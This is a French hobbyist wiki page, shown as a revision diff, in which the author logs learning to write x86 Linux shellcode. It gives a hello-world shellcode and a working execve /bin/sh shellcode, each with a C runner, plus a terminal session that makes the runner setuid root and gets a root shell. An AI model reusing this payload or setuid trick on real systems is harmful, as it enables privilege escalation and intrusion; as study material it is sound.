« Hiteck » : différence entre les versions

De HackBBS
Aller à la navigation Aller à la recherche
Blackdevil (discussion | contributions)
Aucun résumé des modifications
Blackdevil (discussion | contributions)
Aucun résumé des modifications
Ligne 2 : Ligne 2 :


<p>
<p>
<b><u>Jeudi 17 juin 2010 :</u></b>
<br />
Je me lance dans la programmation de shellcode, je trouves les shellcodes super difficile, brefff au boulot :-D
<br /><br />
Voila mon shellcode qui affiche hello world ! :-D<br /><br />
#include <stdio.h><br />
char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\xeb\x05\x59\xb2\x0d\xcd\x80\xe8\xf6\xff\xff\xffHello world!";<br />
int main(void)<br />
{<br />
(*(void(*)()) shellcode)();<br />   
}<br /><br />
Et voici un exemple :-D<br />
hiteck@hiteck:~/Bureau/exploits/real$ ./shell<br />
Hello world!<br />
^C<br />
hiteck@hiteck:~/Bureau/exploits/real$<br />
<br />
je tiens a dire un grand remerciement à RootBSD qui m'a aider à corriger du shellcode, sans lui je ne serais pas arrivé merci a toi RootBSD.<br />
<b><u>Amusez vous bien, sur ce un vrai shellcode est en construction bye :-D.</u></b><br /><br /><br />
<b><u>Vendredi 18 juin 2010 :</u></b><br />
<b><u>Vendredi 18 juin 2010 :</u></b><br />
Enfin un vrai shellcode qui ouvre un shell c'est magnifique tout sa :-D<br /><br />
Enfin un vrai shellcode qui ouvre un shell c'est magnifique tout sa :-D<br /><br />

Version du 18 juin 2010 à 13:36

Shellcoding

Vendredi 18 juin 2010 :
Enfin un vrai shellcode qui ouvre un shell c'est magnifique tout sa :-D

#include <stdio.h>
char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
int main(void)
{
(*(void(*)()) shellcode)();
}

Encore un petit exemple :D
root@hiteck:/home/hiteck/Bureau/exploits# chown root.root shell1
root@hiteck:/home/hiteck/Bureau/exploits# chmod +s shell1
root@hiteck:/home/hiteck/Bureau/exploits# ls -l shell1
-rwsr-sr-x 1 root root 8317 2010-06-17 23:47 shell1
root@hiteck:/home/hiteck/Bureau/exploits# exit
exit
hiteck@hiteck:~/Bureau/exploits$ ./shell1
$# whoami
root
$# echo "Local shellcode remote :-D"
Local shellcode remote :-D
$# exit
hiteck@hiteck:~/Bureau/exploits$
A la prochaine :-D